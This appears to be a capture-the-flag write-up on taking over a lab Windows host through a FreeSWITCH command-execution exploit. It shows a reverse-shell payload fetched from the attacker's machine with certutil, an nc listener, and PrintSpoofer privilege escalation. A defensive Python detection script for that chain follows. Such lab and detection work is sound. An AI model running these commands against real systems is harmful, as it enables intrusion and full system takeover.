How low are your morals?
nmap -sV -sC -p- -T5 10.10.135.236 -Pn
There is a service running on port 8021: FreeSWITCH.
Vulnerability research – FreeSWITCH:
The 47799.txt file contains an exploit written in Python. Rename it with a .py extension:
mv 47799.txt 47799.py
Does the exploit work? Is the service vulnerable? We don’t get a lot of information about the service itself, so the only way to find out is to test:
python3.9 47799.py 10.10.135.236 whoami
The exploit works. We were able to get the name of the user running the service.
We can now use the exploit to get a reverse shell. First, generate the payload:
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.38.124 LPORT=4444 -f exe -o sr.exe
Setting up a web server on Kali:
python3.9 -m http.server 8787
python3.9 47799.py 10.10.135.236 'certutil -urlcache -split -f http://10.11.38.124:8787/sr.exe'
Setting up a netcat listener:
nc -nlvp 4444
python3.9 47799.py 10.10.135.236 'sr.exe'
Receiving the reverse shell:
The user has the SeImpersonatePrivilege privilege.
PrintSpoofer.exe -i -c cmd
Note that the command may not work the first time. Do not hesitate to run it again several times.
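A defender-side view of the chain above, as an added example that is not part of the original write-up: two detection rules run over constructed process-creation records, one for certutil used as a downloader and one for the FreeSWITCH service spawning a command interpreter. The record field names, the FreeSwitchConsole.exe image name and the assumption that the service's commands show up as cmd.exe children are illustrative and need adapting to your own telemetry.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style). Field names
# and the FreeSWITCH image name are assumptions; adapt them to your telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\FreeSWITCH\FreeSwitchConsole.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://10.11.38.124:8787/sr.exe"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -hashfile report.pdf SHA256"},
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Program Files\FreeSWITCH\FreeSwitchConsole.exe",
     "cmdline": "FreeSwitchConsole.exe"},
]

SHELLS = {"cmd.exe", "powershell.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect(event, service_images=("freeswitchconsole.exe",)):
    """Return the names of the rules a process-creation event matches."""
    hits = []
    image, parent = basename(event["image"]), basename(event["parent"])
    switches = {arg.lstrip("-/") for arg in event["cmdline"].lower().split()}
    # Rule 1: certutil used as a downloader (-urlcache plus a remote URL).
    if (image == "certutil.exe" and "urlcache" in switches
            and URL_RE.search(event["cmdline"])):
        hits.append("certutil_remote_download")
    # Rule 2: the telephony service process spawning a command interpreter.
    if parent in service_images and image in SHELLS:
        hits.append("service_spawned_shell")
    return hits

def scan(events):
    """Index and matched rules for every event that triggers at least one rule."""
    return [(i, hits) for i, e in enumerate(events) if (hits := detect(e))]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(index, hits, SAMPLE_EVENTS[index]["cmdline"])
```

The benign certutil -hashfile call and the normal service start are deliberately left unflagged, which is the false-positive behaviour to check when tuning these rules.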
That’s all folks
Thank you for taking the trouble to come to the site to read this write-up.
I hope you liked it and that it taught you new things.
Feel free to leave a comment or share this article.